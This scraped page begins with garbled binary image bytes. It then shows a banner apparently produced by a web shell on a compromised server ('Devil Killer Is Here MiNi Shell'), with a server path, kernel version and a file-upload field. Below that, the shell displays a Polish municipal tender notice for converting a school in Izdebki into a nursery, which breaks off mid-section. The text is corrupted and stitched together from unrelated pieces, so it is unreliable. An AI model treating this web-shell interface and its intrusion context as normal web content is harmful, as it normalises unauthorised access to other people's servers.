JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250228/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250228/0012589101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa części Szkoły Podstawowej w Izdebkach na żłobek w ramach zadania pn. „Żłobek AKTYWNY MALUCH w Izdebkach, 36-203 Izdebki 438” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nozdrzec</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Nozdrzec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440181</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nozdrzec 224</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nozdrzec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-245</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@nozdrzec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nozdrzec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa części Szkoły Podstawowej w Izdebkach na żłobek w ramach zadania pn. „Żłobek AKTYWNY MALUCH w Izdebkach, 36-203 Izdebki 438” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f0cf1b68-28e7-408e-b9e2-8932b1e994a1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00125891</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00086766/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa części Szkoły Podstawowej w Izdebkach na żłobek w ramach zadania pn. &#34;Żłobek AKTYWNY MALUCH w Izdebkach, 36-203 Izdebki 438&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie inwestycyjne jest dofinansowywane ze środków finansowych Krajowego Planu Odbudowy oraz środków budżetu państwa w ramach zadania pn. „Żłobek Aktywny Maluch w Izdebkach, 36-203 Izdebki 438”, w obrębie Programu rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „Aktywny Maluch 2022-2029” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1053937 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/nozdrzec</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Informacje dotyczące korzystania z Platformy zakupowej:<br/>1) W prowadzonym postępowaniu, komunikacja między Zamawiającym, a Wykonawcami (w tym również składanie ofert) odbywać się będzie wyłącznie przy użyciu środków komunikacji elektronicznej, w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. 2020 r., poz. 344 z późn. zm.), tj. poprzez Platformę dostępną pod adresem: https://platformazakupowa.pl/pn/nozdrzec<br/>2) Na wskazanej stronie internetowej Operatora Platformy znajdują się odnośniki do:<br/>a) regulaminu korzystania z Platformy;<br/>b) instrukcji korzystania z Platformy dla Wykonawców (w tym opis sposobu złożenia, zmiany i wycofania oferty);<br/>c) kontaktu do Centrum Wsparcia Klienta, gdzie Wykonawca może uzyskać pomoc techniczną;<br/>3) Wykonawca przystępując do postępowania o udzielenie zamówienia akceptuje warunki korzystania z Platformy – określone w Regulaminie Platformy, oraz uznaje go za wiążący. Korzystanie z Platformy jest bezpłatne. W celu założenia konta użytkownika na Platformie, konieczne jest posiadanie przez użytkownika aktywnego konta poczty elektronicznej (e-mail);<br/>4) W sytuacjach awaryjnych, np. w przypadku braku działania Platformy, Zamawiający dopuszcza możliwość komunikowania się z Wykonawcami przy użyciu poczty elektronicznej;<br/>6) Niezbędne (minimalne) wymagania techniczne umożliwiające korzystanie z Platformy:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB RAM, procesor Intel IV 2 GHz lub jego nowsza wersja, jeden z systemów operacyjnych MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;<br/>c) zainstalowana dowolna przeglądarka internetowa (w przypadku przeglądarki Internet Explorer minimalna wersja 10 0;<br/>d) włączona obsługa języka „JavaScript”;<br/>e) zainstalowany program „Acrobat Reader” lub inny program do obsługi plików w formacie „.pdf”;<br/>f) Platforma działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8;<br/>g) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss), generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6) Oferta, oświadczenia, podmiotowe środki dowodowe i pełnomocnictwa, należy sporządzić w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podst. art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne.<br/>7) Oferta wraz z jej załącznikami musi być podpisana elektronicznie:<br/>a) kwalifikowanym podpisem elektronicznym, lub;<br/>b) podpisem zaufanym, lub;<br/>c) podpisem osobistym;<br/>przez osobę lub osoby upoważnione do reprezentowania Wykonawcy, zgodnie<br/>z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie właściwym dla danej formy organizacyjnej Wykonawcy, albo przez upełnomocnionego przedstawiciela Wykonawcy;<br/>8) Zalecenia Zamawiającego odnośnie podpisu elektronicznego:<br/>a) zalecenia odnośnie kwalifikowanego podpisu elektronicznego:<br/>- dla dokumentów sporządzonych w formacie „.pdf” zaleca się podpis formatem PAdES (PDF Advanced Electronic Signature);<br/>- dokumenty w formacie innym niż „.pdf” zaleca się podpisywać formatem XAdES (XML Advanced Electronic Signature);<br/>b) zalecenia odnośnie podpisu zaufanego:<br/>- wielkość plików nie może przekraczać 10 MB,<br/>- dla dokumentów w formacie „pdf” zaleca się podpis formatem PAdES (podpisany plik ma rozszerzenie .pdf);<br/>- dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES (podpisany plik ma rozszerzenie .xml).<br/>c) zalecenia odnośnie podpisu osobistego:<br/>- w przypadku wykorzystywania aplikacji eDO App (obsługuje tylko dokumenty w formacie .pdf) na telefonach z obsługą technologii NFC wielkość dokumentów nie może przekraczać 5 MB;<br/>- dla dokumentów w formacie „.pdf” zaleca się podpis wewnętrzny (otoczony);<br/>- dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) Administratorem danych osobowych Wykonawcy jest Gmina Nozdrzec z siedzibą w 36-245 Nozdrzec 224;<br/>2) Inspektorem ochrony danych osobowych w Gminie Nozdrzec jest Pani Katarzyna Nowosielska, kontakt: e-mail:, tel. 13 43 98 020;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego.<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych.<br/>5) Pani/Pana dane osobowe będą przetwarzane w czasie określonym przepisami prawa, oraz zgodnie z instrukcją kancelaryjną.<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym, określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych.<br/>7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) Posiada Pani/Pan:<br/>a. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu, albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień publicznych oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) Nie przysługuje Pani/Panu:<br/>a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IKŚR.271.1.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa wraz ze zmianą sposobu użytkowania parteru budynku Szkoły Podstawowej w Izdebkach na żłobek w ramach programu &#34;AKTYWNY MALUCH 2022-2029&#34;. W ramach planowanych prac budowlanych – na parterze budynku zostanie utworzona sala przeznaczona dla kilkunastoosobowej grupy dzieci wraz z zapleczem sanitarnym, kuchennym oraz socjalnym. Zamierzenie inwestycyjne obejmuje również m.in przebudowę biegów schodowych prowadzących na pierwsze piętro budynku, wraz z przebudową pomieszczeń na parterze dostosowanych do nowego układu funkcjonalnego, z jednoczesnym wykonaniem instalacji elektrycznej, sanitarnej w przebudowywanych częściach budynku. Dodatkowo, w zakres przedmiotowego zamówienia wchodzi również wykonanie pochylni dla osób niepełnosprawnych (przy wejściu głównym obiektu) z jednoczesną przebudową schodów zewnętrznych (przy wejściu głównym i z tyłu obiektu) oraz wykonanie odpowiedniego oznakowania ostrzegawczego na biegach schodowych zewnętrznych i wewnętrznych. <br/><br/>Przedmiot zamówienia obejmuje rozbudowany katalog prac do wykonania, wśród których znajdują się m.in.:<br/>•	wykonanie pochylni zewnętrznej dla osób niepełnosprawnych;<br/>•	utworzenie łazienki dla osób niepełnosprawnych;<br/>•	montaż niezbędnych pochwytów na klatce schodowej (na wysokości 110 cm);<br/>•	wymiana wskazanych w dokumentacji drzwi zewnętrznych oraz wewnętrznych;<br/>•	tynkowanie, wykonanie gładzi gipsowej, malowanie i układanie płytek ceramicznych (o odpowiedniej klasie ścieralności);<br/>•	wymiana posadzki na wykładzinę o odpowiedniej klasie antypoślizgowej;<br/>•	oznakowanie schodów wewnętrznych z wykorzystaniem faktury ostrzegawczej oraz pasów kontrastowych;<br/>•	oznakowanie schodów zewnętrznych z wykorzystaniem faktury ostrzegawczej oraz pasów kontrastowych;<br/>•	oznakowanie przegród przezroczystych (drzwi wewnętrznych i zewnętrznych) w sposób kontrastowy;<br/>•	wykonanie nowej instalacji elektrycznej w części budynku podlegającej remontowi;<br/>•	wykonanie niezbędnych elementów instalacji kanalizacji sanitarnej, <br/>•	wykonanie instalacji wody zimnej i cwu.;<br/>•	wykonanie instalacji ogrzewania grzejnikowego;<br/>•	instalacja wentylacji mechanicznej;<br/>•	instalacja klimatyzacji;<br/>•	wykonanie instalacji gazowej;<br/>•	wyposażenie kuchni, a w tym: wyposażenie zmywalni, kuchni zimnej, kuchni produkcyjnej, pomieszczenia obróbki warzyw i jaj oraz magazynu chłodniczego i magazynu warzyw i owoców;<br/><br/>Dopełnieniem wyżej wskazanych robót budowlanych jest zaopatrzenie nowopowstałego żłobka w niezbędne wyposażenie. W ramach przedmiotu zamówienia, Wykonawca zobowiązuje się zatem również dostarczyć oraz – w razie konieczności również zamontować – następujące elementy:<br/>•	zabawki i pomoce edukacyjne;<br/>•	wyposażenie kuchni w małe AGD;<br/>•	wyposażenie łazienek;<br/>•	wyposażenie pomieszczenia administracyjnego;<br/>•	wyposażenie pomieszczenia socjalnego;<br/>•	sprzęty służące utrzymaniu czystości;<br/>•	wyposażenie sali żłobkowej;<br/>•	wyposażenie sali spotkań i ćwiczeń ruchowych;<br/>•	wyposażenie szatni;<br/><br/>Szczegółowy zakres wyposażenia podlegający dostawie został określony w Zał. Nr 10.<br/><br/>Uwaga: <br/>Przed przygotowaniem oferty należy zapoznać się z całością dokumentacji będącej załącznikiem do niniejszego ogłoszenia. W/w dokumentacja zawiera szczegółowy zakres przedmiotu zamówienia. <br/><br/>Szczegółowy opis przedmiotu zamówienia zawierają załączone przez Zamawiajacego:<br/>1)	Dokumentacja projektowa;<br/>2)	Przedmiary robót:<br/>z zastrzeżeniem, że mają one jedynie charakter poglądowy, informacyjny oraz należy je traktować w sposób pomocniczy i uzupełniający do Dokumentacji projektowej i technicznej, przy określeniu rzeczywistego zakresu robót składających się na przedmiot zamówienia;<br/>3) Specyfikacje techniczne wykonania i odbioru robót budowlanych;<br/>oraz <br/>4) Szczegółowy zakres dostaw – Zał. Nr. 10; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45324000-4 - Roboty w zakresie okładziny tynkowej</p> <p class="mb-0">45432130-4 - Pokrywanie podłóg</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45223500-1 - Konstrukcje z betonu zbrojonego</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">39162100-6 - Pomoce dydaktyczne</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">39161000-8 - Meble przedszkolne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. O wyborze oferty najkorzystniejszej decydować będą kryteria:<br/>Cena oferty – waga kryterium: 60 %<br/>Okres gwarancji – waga kryterium: 40 %<br/><br/>2. Ocena punktowa dotyczyć będzie wyłącznie ofert nie podlegających odrzuceniu.<br/><br/>3. Ocena punktowa ofert dokonywana będzie w niżej określony sposób:<br/>W ramach kryterium cena oferty:<br/>- maksymalna ilość możliwych do uzyskania punktów: P1 = 60 pkt.;<br/>- oferta z najniższą oferowaną ceną „C min” otrzyma 60 pkt.;<br/>- każda inna oferta „C” otrzyma ilość punktów wynikającą z wyliczenia wg wzoru:<br/><br/>P1 = (C min)/C x 60=⋯ pkt.<br/><br/>Uwaga:<br/>Przez cenę oferty należy rozumieć cenę brutto za wykonanie przedmiotu zamówienia, podaną przez Wykonawcę w Formularzu oferty.<br/><br/>W ramach kryterium okres gwarancji:<br/>- maksymalna ilość możliwych do uzyskania punktów: P2 = 40 pkt.;<br/>- Wykonawca, który w ofercie zobowiąże się do udzielenia gwarancji jakości<br/>i rękojmi za wady fizyczne wykonanych robót na okres:<br/>3 lat otrzyma 0 pkt.;<br/>4 lat otrzyma 10 pkt.;<br/>5 lat otrzyma 25 pkt.;<br/>6 lat otrzyma 40 pkt.<br/><br/>Uwaga:<br/>Dodatkowe punkty zostaną przyznane wyłącznie Wykonawcom, którzy w ofercie zobowiązali się do udzielenia gwarancji i rękojmi za wady na okres odpowiednio 4, 5 lub 6 lat. Oferta z gwarancją i rękojmią za wady udzieloną na okres dłuższy niż 6 lat, otrzyma również maksymalną ilość punktów możliwych do uzyskania w tym kryterium. W przypadku nie określenia przez Wykonawcę w<br/>ofercie okresu gwarancji, dla potrzeb oceny oferty zostanie przyjęty okres wymagany, tj.: 3 lata.<br/><br/>4. Realizacja zamówienia zostanie powierzona Wykonawcy, który spełni wszystkie postawione w Specyfikacji warunki i uzyska<br/>najwyższą ilość punktów wyliczoną zgodnie ze wzorem:<br/>P=P1+P2=⋯pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów 